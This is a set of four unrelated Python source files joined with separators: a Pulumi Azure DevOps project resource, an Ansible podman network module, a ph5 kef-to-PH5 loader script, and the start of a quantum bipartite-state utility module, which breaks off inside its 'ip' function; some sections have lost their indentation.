:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ProjectArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a project within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
description="Test Project Description",
features={
"artifacts": "disabled",
"testplans": "disabled",
},
version_control="Git",
visibility="private",
work_item_template="Agile")
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Projects](https://docs.microsoft.com/en-us/rest/api/azure/devops/core/projects?view=azure-devops-rest-5.1)
## PAT Permissions Required
- **Project & Team**: Read, Write, & Manage
## Import
Azure DevOps Projects can be imported using the project name or by the project Guid, e.g.
```sh
$ pulumi import azuredevops:index/project:Project project "Test Project"
```
or
```sh
$ pulumi import azuredevops:index/project:Project project 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param ProjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 version_control: Optional[pulumi.Input[str]] = None,
                 visibility: Optional[pulumi.Input[str]] = None,
                 work_item_template: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: validate
        # options, build the property bag, and register the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No opts.id: we are creating a new resource, so all input
            # properties are collected into a fresh ProjectArgs bag.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ProjectArgs.__new__(ProjectArgs)
            __props__.__dict__["description"] = description
            __props__.__dict__["features"] = features
            __props__.__dict__["name"] = name
            __props__.__dict__["version_control"] = version_control
            __props__.__dict__["visibility"] = visibility
            __props__.__dict__["work_item_template"] = work_item_template
            # Output-only property: the provider fills this in.
            __props__.__dict__["process_template_id"] = None
        # Keep the legacy 'azuredevops:Core/project:Project' type token as an
        # alias so stacks created with the old token keep working.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azuredevops:Core/project:Project")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(Project, __self__).__init__(
            'azuredevops:index/project:Project',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
process_template_id: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None) -> 'Project':
"""
Get an existing Project resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] process_template_id: The Process Template ID used by the Project.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProjectState.__new__(_ProjectState)
__props__.__dict__["description"] = description
__props__.__dict__["features"] = features
__props__.__dict__["name"] = name
__props__.__dict__["process_template_id"] = process_template_id
__props__.__dict__["version_control"] = version_control
__props__.__dict__["visibility"] = visibility
__props__.__dict__["work_item_template"] = work_item_template
return Project(resource_name, opts=opts, __props__=__props__)
    # Output accessor for the resource's 'description' property.
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The Description of the Project.
        """
        return pulumi.get(self, "description")
    # Output accessor for the resource's 'features' property.
    @property
    @pulumi.getter
    def features(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Defines the status (`enabled`, `disabled`) of the project features.
        Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
        """
        return pulumi.get(self, "features")
    # Output accessor for the resource's 'name' property.
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The Project Name.
        """
        return pulumi.get(self, "name")
    # Output-only accessor (populated by the provider, see _internal_init).
    @property
    @pulumi.getter(name="processTemplateId")
    def process_template_id(self) -> pulumi.Output[str]:
        """
        The Process Template ID used by the Project.
        """
        return pulumi.get(self, "process_template_id")
    # Output accessor for the resource's 'versionControl' property.
    @property
    @pulumi.getter(name="versionControl")
    def version_control(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
        """
        return pulumi.get(self, "version_control")
    # Output accessor for the resource's 'visibility' property.
    @property
    @pulumi.getter
    def visibility(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
        """
        return pulumi.get(self, "visibility")
    # Output accessor for the resource's 'workItemTemplate' property.
    @property
    @pulumi.getter(name="workItemTemplate")
    def work_item_template(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
        """
        return pulumi.get(self, "work_item_template")
|
#!/usr/bin/python
# Copyright (c) 2020 Red Hat
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r"""
module: podman_network
author:
- "<NAME> (@sshnaidm)"
version_added: '1.0.0'
short_description: Manage podman networks
notes: []
description:
- Manage podman networks with podman network command.
requirements:
- podman
options:
name:
description:
- Name of the network
type: str
required: True
executable:
description:
- Path to C(podman) executable if it is not in the C($PATH) on the
machine running C(podman)
default: 'podman'
type: str
disable_dns:
description:
- disable dns plugin (default "false")
type: bool
driver:
description:
- Driver to manage the network (default "bridge")
type: str
gateway:
description:
- IPv4 or IPv6 gateway for the subnet
type: str
internal:
description:
- Restrict external access from this network (default "false")
type: bool
ip_range:
description:
- Allocate container IP from range
type: str
ipv6:
description:
- Enable IPv6 (Dual Stack) networking. You must pass a IPv6 subnet.
The subnet option must be used with the ipv6 option.
type: bool
subnet:
description:
- Subnet in CIDR format
type: str
macvlan:
description:
- Create a Macvlan connection based on this device
type: str
opt:
description:
- Add network options. Currently 'vlan' and 'mtu' are supported.
type: dict
suboptions:
mtu:
description:
- MTU size for bridge network interface.
type: int
required: false
vlan:
description:
- VLAN tag for bridge which enables vlan_filtering.
type: int
required: false
debug:
description:
- Return additional information which can be helpful for investigations.
type: bool
default: False
state:
description:
- State of network, default 'present'
type: str
default: present
choices:
- present
- absent
recreate:
description:
- Recreate network even if exists.
type: bool
default: false
"""
EXAMPLES = r"""
- name: Create a podman network
containers.podman.podman_network:
name: podman_network
become: true
- name: Create internal podman network
containers.podman.podman_network:
name: podman_internal
internal: true
ip_range: 192.168.22.128/25
subnet: 192.168.22.0/24
gateway: 192.168.22.1
become: true
"""
RETURN = r"""
network:
description: Facts from created or updated networks
returned: always
type: list
sample: [
{
"cniVersion": "0.4.0",
"name": "podman",
"plugins": [
{
"bridge": "cni-podman0",
"ipMasq": true,
"ipam": {
"ranges": [
[
{
"gateway": "10.88.0.1",
"subnet": "10.88.0.0/16"
}
]
],
"routes": [
{
"dst": "0.0.0.0/0"
}
],
"type": "host-local"
},
"isGateway": true,
"type": "bridge"
},
{
"capabilities": {
"portMappings": true
},
"type": "portmap"
},
{
"backend": "iptables",
"type": "firewall"
}
]
}
]
"""
import json # noqa: F402
from distutils.version import LooseVersion # noqa: F402
import os # noqa: F402
try:
import ipaddress
HAS_IP_ADDRESS_MODULE = True
except ImportError:
HAS_IP_ADDRESS_MODULE = False
from ansible.module_utils.basic import AnsibleModule # noqa: F402
from ansible.module_utils._text import to_bytes, to_native # noqa: F402
from ansible_collections.containers.podman.plugins.module_utils.podman.common import lower_keys
class PodmanNetworkModuleParams:
"""Creates list of arguments for podman CLI command.
Arguments:
action {str} -- action type from 'create', 'delete'
params {dict} -- dictionary of module parameters
"""
def __init__(self, action, params, podman_version, module):
self.params = params
self.action = action
self.podman_version = podman_version
self.module = module
def construct_command_from_params(self):
"""Create a podman command from given module parameters.
Returns:
list -- list of byte strings for Popen command
"""
if self.action in ['delete']:
return self._simple_action()
if self.action in ['create']:
return self._create_action()
def _simple_action(self):
if self.action == 'delete':
cmd = ['rm', '-f', self.params['name']]
return [to_bytes(i, errors='surrogate_or_strict') for i in cmd]
def _create_action(self):
cmd = [self.action, self.params['name']]
all_param_methods = [func for func in dir(self)
if callable(getattr(self, func))
and func.startswith("addparam")]
params_set = (i for i in self.params if self.params[i] is not None)
for param in params_set:
func_name = "_".join(["addparam", param])
if func_name in all_param_methods:
cmd = getattr(self, func_name)(cmd)
return [to_bytes(i, errors='surrogate_or_strict') for i in cmd]
def check_version(self, param, minv=None, maxv=None):
if minv and LooseVersion(minv) > LooseVersion(
self.podman_version):
self.module.fail_json(msg="Parameter %s is supported from podman "
"version %s only! Current version is %s" % (
param, minv, self.podman_version))
if maxv and LooseVersion(maxv) < LooseVersion(
self.podman_version):
self.module.fail_json(msg="Parameter %s is supported till podman "
"version %s only! Current version is %s" % (
param, minv, self.podman_version))
def addparam_gateway(self, c):
return c + ['--gateway', self.params['gateway']]
def addparam_driver(self, c):
return c + ['--driver', self.params['driver']]
def addparam_subnet(self, c):
return c + ['--subnet', self.params['subnet']]
def addparam_ip_range(self, c):
return c + ['--ip-range', self.params['ip_range']]
def addparam_ipv6(self, c):
return c + ['--ipv6=%s' % self.params['ipv6']]
def addparam_macvlan(self, c):
return c + ['--macvlan', self.params['macvlan']]
def addparam_internal(self, c):
return c + ['--internal=%s' % self.params['internal']]
def addparam_opt(self, c):
for opt in self.params['opt'].items():
c += ['--opt',
b"=".join([to_bytes(k, errors='surrogate_or_strict')
for k in opt])]
return c
def addparam_disable_dns(self, c):
return c + ['--disable-dns=%s' % self.params['disable_dns']]
class PodmanNetworkDefaults:
    """Default values podman applies to network parameters, possibly
    adjusted for the podman version in use."""
    def __init__(self, module, podman_version):
        self.module = module
        self.version = podman_version
        self.defaults = dict(
            driver='bridge',
            disable_dns=False,
            internal=False,
        )
    def default_dict(self):
        """Return the defaults dict (hook for version-specific tweaks)."""
        return self.defaults
class PodmanNetworkDiff:
    """Compare an existing network's state with the desired module params.
    Each diffparam_* method computes one parameter's current ("before")
    value from `podman network inspect` output and its desired ("after")
    value from the module parameters (with podman defaults filled in).
    """
    def __init__(self, module, info, podman_version):
        self.module = module
        self.version = podman_version
        self.default_dict = None
        # inspect output with all keys lower-cased for uniform access
        self.info = lower_keys(info)
        self.params = self.defaultize()
        self.diff = {'before': {}, 'after': {}}
        self.non_idempotent = {}
    def defaultize(self):
        # Fill in podman's defaults for parameters the user did not set.
        params_with_defaults = {}
        self.default_dict = PodmanNetworkDefaults(
            self.module, self.version).default_dict()
        for p in self.module.params:
            if self.module.params[p] is None and p in self.default_dict:
                params_with_defaults[p] = self.default_dict[p]
            else:
                params_with_defaults[p] = self.module.params[p]
        return params_with_defaults
    def _diff_update_and_compare(self, param_name, before, after):
        # Record the before/after pair and report whether they differ.
        if before != after:
            self.diff['before'].update({param_name: before})
            self.diff['after'].update({param_name: after})
            return True
        return False
    def diffparam_disable_dns(self):
        # Whether network is internal or not
        try:
            internal = not self.info['plugins'][0]['isgateway']
        except (IndexError, KeyError):
            internal = False
        # Whether network is rootless
        rootless = os.geteuid() != 0
        # Whether DNS plugin is installed
        dns_installed = False
        for f in [
            '/usr/libexec/cni/dnsname',
            '/usr/lib/cni/dnsname',
            '/opt/cni/bin/dnsname',
            '/opt/bridge/bin/dnsname'
        ]:
            if os.path.exists(f):
                dns_installed = True
        # DNS is considered enabled when any CNI plugin entry carries a
        # 'domainname' key.
        before = not bool(
            [k for k in self.info['plugins'] if 'domainname' in k])
        if internal:
            before = True
        if rootless:
            before = False
        after = self.params['disable_dns']
        # If dnsname plugin is not installed, default is disable_dns=True
        if not dns_installed and self.module.params['disable_dns'] is None:
            after = True
        # Rootless networks will always have DNS enabled
        if rootless and self.module.params['disable_dns'] is None:
            after = False
        # Internal networks have dns disabled from v3
        if self.params['internal']:
            after = True
        return self._diff_update_and_compare('disable_dns', before, after)
    def diffparam_driver(self):
        # Currently only bridge is supported
        before = after = 'bridge'
        return self._diff_update_and_compare('driver', before, after)
    def diffparam_gateway(self):
        # Gateway lives in the first plugin's first ipam range entry.
        try:
            before = self.info['plugins'][0]['ipam']['ranges'][0][0]['gateway']
        except (IndexError, KeyError):
            before = ''
        after = before
        if self.params['gateway'] is not None:
            after = self.params['gateway']
        return self._diff_update_and_compare('gateway', before, after)
    def diffparam_internal(self):
        # A network without a gateway plugin is considered internal.
        try:
            before = not self.info['plugins'][0]['isgateway']
        except (IndexError, KeyError):
            before = False
        after = self.params['internal']
        return self._diff_update_and_compare('internal', before, after)
    def diffparam_ip_range(self):
        # TODO(sshnaidm): implement IP to CIDR convert and vice versa
        before = after = ''
        return self._diff_update_and_compare('ip_range', before, after)
    def diffparam_subnet(self):
        try:
            before = self.info['plugins'][0]['ipam']['ranges'][0][0]['subnet']
        except (IndexError, KeyError):
            before = ''
        after = before
        if self.params['subnet'] is not None:
            after = self.params['subnet']
            if HAS_IP_ADDRESS_MODULE:
                # Normalize to the compressed CIDR form podman reports.
                after = ipaddress.ip_network(after).compressed
        return self._diff_update_and_compare('subnet', before, after)
    def diffparam_macvlan(self):
        # Not inspectable -- treated as always unchanged.
        before = after = ''
        return self._diff_update_and_compare('macvlan', before, after)
    def diffparam_opt(self):
        # Only 'vlan' and 'mtu' options are tracked; a key is included in
        # the comparison when it is set on either side.
        vlan_before = self.info['plugins'][0].get('vlan')
        vlan_after = self.params['opt'].get('vlan') if self.params['opt'] else None
        if vlan_before or vlan_after:
            before, after = {'vlan': vlan_before}, {'vlan': vlan_after}
        else:
            before, after = {}, {}
        mtu_before = self.info['plugins'][0].get('mtu')
        mtu_after = self.params['opt'].get('mtu') if self.params['opt'] else None
        if mtu_before or mtu_after:
            before.update({'mtu': mtu_before})
            after.update({'mtu': mtu_after})
        return self._diff_update_and_compare('opt', before, after)
    def is_different(self):
        # Run every diffparam_* check. In non-diff mode we can stop at the
        # first difference; in diff mode all checks run so self.diff is
        # complete for display.
        diff_func_list = [func for func in dir(self)
                          if callable(getattr(self, func)) and func.startswith(
                              "diffparam")]
        fail_fast = not bool(self.module._diff)
        different = False
        for func_name in diff_func_list:
            dff_func = getattr(self, func_name)
            if dff_func():
                if fail_fast:
                    return True
                different = True
        # Check non idempotent parameters
        for p in self.non_idempotent:
            if self.module.params[p] is not None and self.module.params[p] not in [{}, [], '']:
                different = True
        return different
class PodmanNetwork:
    """Perform network tasks.
    Manages podman network, inspects it and checks its current state
    """
    def __init__(self, module, name):
        """Initialize PodmanNetwork class.
        Arguments:
            module {obj} -- ansible module object
            name {str} -- name of network
        """
        super(PodmanNetwork, self).__init__()
        self.module = module
        self.name = name
        self.stdout, self.stderr = '', ''
        # {} when the network does not exist (see get_info)
        self.info = self.get_info()
        self.version = self._get_podman_version()
        self.diff = {}
        # full podman command lines executed, for result reporting
        self.actions = []
    @property
    def exists(self):
        """Check if network exists."""
        return bool(self.info != {})
    @property
    def different(self):
        """Check if network is different."""
        diffcheck = PodmanNetworkDiff(
            self.module,
            self.info,
            self.version)
        is_different = diffcheck.is_different()
        diffs = diffcheck.diff
        # In diff mode, render the before/after dicts as sorted text blocks
        # for ansible's --diff display.
        if self.module._diff and is_different and diffs['before'] and diffs['after']:
            self.diff['before'] = "\n".join(
                ["%s - %s" % (k, v) for k, v in sorted(
                    diffs['before'].items())]) + "\n"
            self.diff['after'] = "\n".join(
                ["%s - %s" % (k, v) for k, v in sorted(
                    diffs['after'].items())]) + "\n"
        return is_different
    def get_info(self):
        """Inspect network and gather info about it."""
        # pylint: disable=unused-variable
        rc, out, err = self.module.run_command(
            [self.module.params['executable'], b'network', b'inspect', self.name])
        # inspect returns a one-element JSON list; {} means "not found".
        return json.loads(out)[0] if rc == 0 else {}
    def _get_podman_version(self):
        # pylint: disable=unused-variable
        rc, out, err = self.module.run_command(
            [self.module.params['executable'], b'--version'])
        if rc != 0 or not out or "version" not in out:
            self.module.fail_json(msg="%s run failed!" %
                                  self.module.params['executable'])
        # Output looks like "podman version X.Y.Z"; keep what follows the
        # word "version".
        return out.split("version")[1].strip()
    def _perform_action(self, action):
        """Perform action with network.
        Arguments:
            action {str} -- action to perform - create, stop, delete
        """
        b_command = PodmanNetworkModuleParams(action,
                                              self.module.params,
                                              self.version,
                                              self.module,
                                              ).construct_command_from_params()
        full_cmd = " ".join([self.module.params['executable'], 'network']
                            + [to_native(i) for i in b_command])
        self.module.log("PODMAN-NETWORK-DEBUG: %s" % full_cmd)
        self.actions.append(full_cmd)
        # In check mode only record the command; do not execute it.
        if not self.module.check_mode:
            rc, out, err = self.module.run_command(
                [self.module.params['executable'], b'network'] + b_command,
                expand_user_and_vars=False)
            self.stdout = out
            self.stderr = err
            if rc != 0:
                self.module.fail_json(
                    msg="Can't %s network %s" % (action, self.name),
                    stdout=out, stderr=err)
    def delete(self):
        """Delete the network."""
        self._perform_action('delete')
    def create(self):
        """Create the network."""
        self._perform_action('create')
    def recreate(self):
        """Recreate the network."""
        self.delete()
        self.create()
class PodmanNetworkManager:
    """Module manager class.
    Defines according to parameters what actions should be applied to network
    """
    def __init__(self, module):
        """Initialize PodmanManager class.
        Arguments:
            module {obj} -- ansible module object
        """
        super(PodmanNetworkManager, self).__init__()
        self.module = module
        self.results = {
            'changed': False,
            'actions': [],
            'network': {},
        }
        self.name = self.module.params['name']
        self.executable = \
            self.module.get_bin_path(self.module.params['executable'],
                                     required=True)
        self.state = self.module.params['state']
        self.recreate = self.module.params['recreate']
        self.network = PodmanNetwork(self.module, self.name)
    def update_network_result(self, changed=True):
        """Inspect the current network, update results with last info, exit.
        Keyword Arguments:
            changed {bool} -- whether any action was performed
                              (default: {True})
        """
        # Re-inspect only when something changed; otherwise reuse the
        # snapshot taken at construction time.
        facts = self.network.get_info() if changed else self.network.info
        out, err = self.network.stdout, self.network.stderr
        self.results.update({'changed': changed, 'network': facts,
                             'podman_actions': self.network.actions},
                            stdout=out, stderr=err)
        if self.network.diff:
            self.results.update({'diff': self.network.diff})
        if self.module.params['debug']:
            self.results.update({'podman_version': self.network.version})
        # exit_json() terminates the module run here.
        self.module.exit_json(**self.results)
    def execute(self):
        """Execute the desired action according to map of actions & states."""
        states_map = {
            'present': self.make_present,
            'absent': self.make_absent,
        }
        process_action = states_map[self.state]
        process_action()
        # Every state handler exits via module.exit_json(); reaching this
        # line means a handler returned without exiting.
        self.module.fail_json(msg="Unexpected logic error happened, "
                              "please contact maintainers ASAP!")
    def make_present(self):
        """Run actions if desired state is 'started'."""
        if not self.network.exists:
            self.network.create()
            self.results['actions'].append('created %s' % self.network.name)
            self.update_network_result()
        elif self.recreate or self.network.different:
            self.network.recreate()
            self.results['actions'].append('recreated %s' %
                                           self.network.name)
            self.update_network_result()
        else:
            self.update_network_result(changed=False)
    def make_absent(self):
        """Run actions if desired state is 'absent'."""
        if not self.network.exists:
            self.results.update({'changed': False})
        elif self.network.exists:
            self.network.delete()
            self.results['actions'].append('deleted %s' % self.network.name)
            self.results.update({'changed': True})
        self.results.update({'network': {},
                             'podman_actions': self.network.actions})
        self.module.exit_json(**self.results)
def main():
    """Module entry point: declare the argument spec and run the manager."""
    spec = dict(
        state=dict(type='str', default="present",
                   choices=['present', 'absent']),
        name=dict(type='str', required=True),
        disable_dns=dict(type='bool', required=False),
        driver=dict(type='str', required=False),
        gateway=dict(type='str', required=False),
        internal=dict(type='bool', required=False),
        ip_range=dict(type='str', required=False),
        ipv6=dict(type='bool', required=False),
        subnet=dict(type='str', required=False),
        macvlan=dict(type='str', required=False),
        opt=dict(type='dict', required=False,
                 options=dict(
                     mtu=dict(type='int', required=False),
                     vlan=dict(type='int', required=False))),
        executable=dict(type='str', required=False, default='podman'),
        debug=dict(type='bool', default=False),
        recreate=dict(type='bool', default=False),
    )
    module = AnsibleModule(
        argument_spec=spec,
        required_by=dict(  # for IP range and GW to set 'subnet' is required
            ip_range=('subnet'),
            gateway=('subnet'),
        ))
    PodmanNetworkManager(module).execute()
if __name__ == '__main__':
    main()
|
#!/usr/bin/env pnpython3
#
# Update a ph5 file from a kef file
#
# <NAME>, January 2007
#
import argparse
import logging
import os
import os.path
import time
from ph5.core import experiment, kefx, columns
# Version stamp, shown in the --help/description output below.
PROG_VERSION = '2018.268'
LOGGER = logging.getLogger(__name__)
# Force time zone to UTC
os.environ['TZ'] = 'UTC'
time.tzset()
def get_args():
    ''' Parse the command line and set the module-level globals
    KEFFILE, PH5, PATH and TRACE.

    Returns the parsed argparse.Namespace as well (backward-compatible
    addition: historical callers relied only on the global side effects).
    '''
    global KEFFILE, PH5, PATH, TRACE
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter)
    parser.usage = ("kef2ph5 --kef kef_file --nickname ph5_file_prefix "
                    "[--path path]")
    parser.description = ("Update a ph5 file from a kef file.\n\nVersion: {0}"
                          .format(PROG_VERSION))
    parser.add_argument("-n", "--nickname", dest="outfile",
                        help="The ph5 file prefix (experiment nickname).",
                        required=True)
    parser.add_argument("-k", "--kef", dest="keffile",
                        help="Kitchen Exchange Format file.", required=True)
    parser.add_argument("-p", "--path", dest="path",
                        help="Path to directory where ph5 files are stored.",
                        default=".")
    parser.add_argument("-c", "--check", action="store_true", default=False,
                        dest="check",
                        help="Show what will be done but don't do it!")
    args = parser.parse_args()
    KEFFILE = args.keffile
    PH5 = args.outfile
    PATH = args.path
    TRACE = args.check
    return args
def initializeExperiment():
    ''' Open the experiment PH5 file (prefix PH5 under PATH) for editing
    and initialize its group structure. '''
    global EX, PH5, PATH
    EX = experiment.ExperimentGroup(nickname=PH5, currentpath=PATH)
    EX.ph5open(True)  # True -> open in edit mode
    EX.initgroup()
def add_references(rs):
    ''' Add a reference for each Das_t so we can look it up later.

    rs -- iterable of '/'-separated table paths; the DAS serial number is
    the third '_'-separated field of the path's fourth element.
    '''
    global EX
    for r in rs:
        # BUGFIX: the function forms string.split(...) were removed in
        # Python 3; use the equivalent str methods (valid on 2 and 3).
        flds = r.split('/')
        das = flds[3].split('_')[2]
        g = EX.ph5_g_receivers.getdas_g(das)
        EX.ph5_g_receivers.setcurrent(g)
        # Set reference
        columns.add_reference(r, EX.ph5_g_receivers.current_t_das)
def populateTables():
    ''' Read the kef file in batches and apply its rows to the PH5 file. '''
    global EX, KEFFILE, TRACE
    LOGGER.info("Loading {0} into {1}.".format(KEFFILE, PH5))
    k = kefx.Kef(KEFFILE)
    k.open()
    # Process the kef file 10000 rows at a time.
    while True:
        n = k.read(10000)
        if n == 0:
            # NOTE(review): this message is never logged -- after the loop
            # only `err is True` is checked, and here err is a string.
            err = "Empty kef file."
            break
        # Get Das_g references
        ret = k.strip_receiver_g()
        if ret:
            add_references(ret)
        # Make sure Array_t_xxx, Event_t_xxx, and Offset_t_aaa_sss exist
        arrays, events, offsets = k.strip_a_e_o()
        if arrays:
            for a in arrays:
                a = a.split(':')[0]
                EX.ph5_g_sorts.newArraySort(a)
        if events:
            for e in events:
                e = e.split(':')[0]
                EX.ph5_g_sorts.newEventSort(e)
        if offsets:
            for o in offsets:
                o = o.split(':')[0]
                EX.ph5_g_sorts.newOffsetSort(o)
        # batch_update applies this chunk; trace mode only prints actions.
        # NOTE(review): err is overwritten each iteration, so only the last
        # batch's status is reported after the loop.
        if TRACE is True:
            err = k.batch_update(trace=True)
        else:
            err = k.batch_update()
    k.close()
    if err is True:
        LOGGER.error("There were errors! See output.")
def closePH5():
    ''' Close the experiment PH5 file opened by initializeExperiment. '''
    global EX
    EX.ph5close()
def update_log():
    ''' Write a log of kef2ph5 activities.

    Appends one "*:*"-separated record (time, ph5 file, kef file, kef
    mtime) to PATH/kef2ph5.log, writing a header first if the log is new.
    '''
    global PH5, KEFFILE, PATH, TRACE
    # Don't log when run with the -c option
    if TRACE is True:
        return
    keffile = KEFFILE
    ph5file = os.path.join(PATH, PH5)
    klog = os.path.join(PATH, "kef2ph5.log")
    kef_mtime = time.ctime(os.stat(keffile).st_mtime)
    now = time.ctime(time.time())
    line = "%s*:*%s*:*%s*:*%s\n" % (now, ph5file, keffile, kef_mtime)
    if not os.path.exists(klog):
        # First write: prepend the header and separator rows.
        line = "modification_time*:*experiment_nickname*:*\
kef_filename*:*kef_file_mod_time\n" + \
               "-------------------------------------------------------------\
-------------\n" + line
    try:
        # Context manager guarantees the handle is closed even on a write
        # error, and success is logged only after the write happened
        # (previously the success message preceded the write).
        with open(klog, 'a+') as fh:
            fh.write(line)
        LOGGER.info("Updated kef2ph5.log file.")
    except BaseException:
        LOGGER.warning("Failed to write kef2ph5.log file.")
def main():
    ''' Run the kef2ph5 workflow: parse args, open the PH5 file, load the
    kef contents, close the file, and record the run in the log. '''
    for step in (get_args, initializeExperiment, populateTables,
                 closePH5, update_log):
        step()
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 04 22:18:20 2018
@author0: MIUK
@author1: FS
Purpose: Deal with the operations on pure bipartite
quantum states
Bipartite states are represented using kronecker product
i.e. with Psi_A = [a,b] Psi_b = [c, d]
-> Psi_AB = Psi_A x Psi_B = [ac, ad, bc, bd] (x is a tensor prod)
Conventions
-----------
+ Computational basis
|0> = [1,0] |1> = [0,1]
then |00> = [1,0,0,0], |01> = [0,1,0,0], |10> = [0,0,1,0]
and |11> = [0,0,0,1]
+ Pauli matrices
X = 0 1 // Y = 0 -i // Z = 1 0
1 0 i 0 0 -1
d: refers to the dimension of the hilbert space
Careful with the dimensions and shapes
"""
import numpy as np
from scipy import linalg, stats, optimize
# ===================================================================================== #
# Manipulation of pure bi-partite states (sometimes slightly more general)
# ===================================================================================== #
# Single-qubit computational basis states |0> and |1>
qb_0 = np.array([1., 0], dtype='complex128')
qb_1 = np.array([0, 1.], dtype='complex128')
# Basis vectors stacked as the columns of a 2x2 array
qb_basis = np.stack([qb_0, qb_1], 1)
# Two-qubit computational basis |00>, |01>, |10>, |11> (Kronecker products)
qbs_00 = np.kron(qb_0, qb_0)
qbs_01 = np.kron(qb_0, qb_1)
qbs_10 = np.kron(qb_1, qb_0)
qbs_11 = np.kron(qb_1, qb_1)
# Maybe change the convention such that it matches the convention for the qubits
# representation
# Single-qubit Pauli matrices and the identity
X = np.array([[0, 1.], [1., 0]], dtype='complex128')
Y = np.array([[0, -1.j], [1.j, 0]], dtype='complex128')
Z = np.array([[1., 0], [0 ,-1]], dtype='complex128')
I = np.array([[1., 0], [0 ,1.]], dtype='complex128')
# The four maximally entangled Bell states
bell0 = 1/np.sqrt(2) * np.array([1., 0, 0, 1.], dtype='complex128')
bell1 = 1/np.sqrt(2) * np.array([1., 0, 0, -1.], dtype='complex128')
bell2 = 1/np.sqrt(2) * np.array([0, 1., 1., 0], dtype='complex128')
bell3 = 1/np.sqrt(2) * np.array([0, 1., -1., 0], dtype='complex128')
def state_to_dm(states):
    """ Compute density matrices |psi><psi| from a state vector or a list
    of state vectors.

    Generalized to any Hilbert-space dimension d (the original hard-coded
    d=4, i.e. two qubits); d is taken from the last axis of `states`.

    Arguments
    ---------
    states: np.array
        1d shape = (d) a single state
        2d shape = (nb_states, d) a collection of states

    Output
    ------
    np.array of shape (d, d) or (nb_states, d, d)

    Raises
    ------
    ValueError if states is not 1- or 2-dimensional (previously this
    crashed with an UnboundLocalError).
    """
    states = np.asarray(states)
    if states.ndim == 2:
        ket = states[:, :, np.newaxis]                  # column vectors
        bra = np.conjugate(states[:, np.newaxis, :])    # dual (row) vectors
    elif states.ndim == 1:
        ket = states[:, np.newaxis]
        bra = np.conjugate(states[np.newaxis, :])
    else:
        raise ValueError("states must be 1d (single state) or 2d "
                         "(collection), got ndim=%d" % states.ndim)
    # Broadcasting performs the outer product |psi><psi| per state.
    return ket * bra
def ip(state0, state1):
    """ Inner product <state0|state1> between two states (or lists of states).
    Arguments
    ---------
    state0, state1: np.array
        1d shape (d) i.e. only one state
        2d shape (n_states, d)
    Output
    ------
    2-d np.array with dimension (nb_states0, nb_states_1)
    """
